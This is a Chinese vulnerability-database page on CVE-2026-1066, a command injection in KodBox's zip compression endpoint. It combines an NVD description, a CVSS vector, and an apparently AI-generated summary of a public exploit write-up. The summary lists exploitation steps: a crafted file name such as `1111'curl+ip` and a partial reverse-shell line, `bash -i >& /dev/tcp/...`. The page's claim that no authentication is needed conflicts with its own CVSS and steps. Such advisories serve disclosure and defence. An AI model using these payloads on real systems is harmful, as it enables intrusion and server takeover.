支持本站 — 捐款将帮助我们持续运营

目标:1000 元,已筹:736

73.6%
一、 漏洞 CVE-2026-1066 基础信息
漏洞信息
                                        # KodBox zip 命令注入漏洞

## 概述
kalcaddle kodbox 在版本 1.61.10 及之前存在一个命令注入漏洞,位于组件压缩处理程序中对 `/explorer/index/zip` 接口的处理逻辑。

## 影响版本
kalcaddle kodbox ≤ 1.61.10

## 细节
漏洞存在于 `/explorer/index/zip` 接口的处理过程中,攻击者可通过特定方式操纵该接口的参数,触发命令注入。无需身份验证即可远程利用。

## 影响
攻击者可远程执行任意命令,完全控制受影响系统。该漏洞已有公开的利用工具,可被实际攻击使用。供应商已提前通知但未回应。
                                        
神龙判断

是否为 Web 类漏洞: 未知

判断理由:

N/A
提示
尽管我们采用了先进的大模型技术,但其输出仍可能包含不准确或过时的信息。
神龙会尽力确保数据准确,但也请结合实际情况进行甄别与判断。
神龙祝您一切顺利!
漏洞标题
kalcaddle kodbox Compression zip command injection
来源:美国国家漏洞数据库 NVD
漏洞描述信息
A vulnerability was detected in kalcaddle kodbox up to 1.61.10. This issue affects some unknown processing of the file /?explorer/index/zip of the component Compression Handler. The manipulation results in command injection. The attack may be launched remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
来源:美国国家漏洞数据库 NVD
CVSS信息
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
来源:美国国家漏洞数据库 NVD
漏洞类别
在命令中使用的特殊元素转义处理不恰当(命令注入)
来源:美国国家漏洞数据库 NVD
二、漏洞 CVE-2026-1066 的公开POC
#POC 描述源链接神龙链接
三、漏洞 CVE-2026-1066 的情报信息
  • 标题: CV3/Krce.md at main · DReazer/CV3 · GitHub -- 🔗来源链接

    标签:exploit

    神龙速读:
                                            ### 关键漏洞信息
    
    - **漏洞类型**: 远程命令执行 (Remote Command Execution, RCE)
    
    - **影响版本**: 1.60.03 版本(1.60.03 release on linux)
    
    - **漏洞存在于**: kodbox V1. 60
    
    - **漏洞操作步骤**:
        - 利用 Kodbox 的注册功能,注册一个普通账号并登录。
        - 在 "My Files" 中上传一个文件。
        - 通过重命名操作,将文件重命名为包含攻击向量的名字。
        - 重命名后的文件名为 `1111'curl+ip`。
        - 执行在线压缩,触发命令执行漏洞。
    
    - **漏洞利用条件**:
        - 具有上传文件和重命名文件的操作权限。
        - 利用了压缩操作的时候,系统对文件名处理不当,导致命令执行。
    
    - **攻击链演示**:
        - 攻击方通过发送特制的文件名,触发命令执行。
        - 通过实时监听,成功连接到被攻击方的服务器,执行了恶意代码逆向 Shell `bash -i >& /dev/tcp/101.132.*.*`.
    
    ### 总结
    该漏洞主要存在于 Kodbox 的 1.60.03 版本中,通过利用特定文件名上传和在线压缩功能触发远程命令执行漏洞,攻击者可以获得服务器的控制权限。需注意,对此漏洞的修复应加强文件名检测、避免直接执行外部文件名宿主系统命令。
                                            
    CV3/Krce.md at main · DReazer/CV3 · GitHub
  • https://vuldb.com/?ctiid.341665signaturepermissions-required
  • https://vuldb.com/?submit.731436third-party-advisory
  • https://vuldb.com/?id.341665vdb-entry
  • https://nvd.nist.gov/vuln/detail/CVE-2026-1066
四、漏洞 CVE-2026-1066 的评论

暂无评论


发表评论